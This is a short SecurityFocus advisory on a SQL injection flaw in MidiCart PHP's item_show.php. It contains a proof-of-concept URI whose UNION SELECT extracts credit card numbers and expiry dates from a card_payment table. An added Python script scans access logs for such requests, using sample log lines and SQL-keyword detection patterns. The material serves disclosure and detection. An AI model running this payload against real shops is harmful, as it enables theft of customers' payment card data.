MidiCart PHP Item_Show.PHP Code_No Parameter SQL Injection Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/shop/item_show.php?code_no=99 ') UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment
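For detection, the following added example (not part of the original advisory or of MidiCart) scans web access log lines for item_show.php requests whose code_no value is not a plain item code. It assumes combined-format logs and that legitimate codes are short alphanumeric strings; the log lines are constructed samples, the second one shaped like the proof of concept above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate code_no values are short alphanumeric item codes.
SAFE_CODE_NO = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Request part of a combined-format log entry: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens that have no place in an item code and indicate SQL syntax.
SQL_HINT = re.compile(r"""\b(union|select|from)\b|['");]|--|/\*""", re.I)

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2010:10:00:00 +0000] '
    '"GET /shop/item_show.php?code_no=99 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2010:10:00:07 +0000] '
    '"GET /shop/item_show.php?code_no=99%27)%20UNION%20SELECT%20null,null'
    '%20FROM%20card_payment HTTP/1.1" 200 7311',
    '203.0.113.5 - - [01/Jan/2010:10:01:00 +0000] '
    '"GET /shop/item_show.php?code_no=99%20 HTTP/1.1" 200 312',
    '203.0.113.5 - - [01/Jan/2010:10:02:00 +0000] '
    '"GET /shop/index.php?code_no=%27 HTTP/1.1" 200 900',
]

def check_line(line):
    """Return (code_no, reason) for a suspicious item_show.php request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/item_show.php"):
        return None
    # parse_qs percent-decodes the value, so %27 and %20 are seen as ' and space.
    for value in parse_qs(url.query, keep_blank_values=True).get("code_no", []):
        if SAFE_CODE_NO.fullmatch(value):
            continue
        reason = "sql-syntax" if SQL_HINT.search(value) else "unexpected-format"
        return value, reason
    return None

def scan(lines):
    """Return [(line_number, code_no, reason)] for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        result = check_line(line)
        if result:
            hits.append((number, *result))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with reason `sql-syntax` on a response that returned 200 is worth correlating with database logs for queries against tables the shop page never reads.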


 

Copyright 2010, SecurityFocus